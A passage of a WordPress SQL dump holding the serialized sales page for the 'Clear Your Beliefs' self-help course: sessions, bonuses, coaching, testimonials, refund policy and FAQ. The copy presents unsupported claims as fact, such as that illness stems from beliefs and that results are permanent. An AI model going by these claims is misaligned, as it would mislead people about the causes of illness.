src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1883, 2168, 'panels_data', 'a:3:{s:7:"widgets";a:4:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our 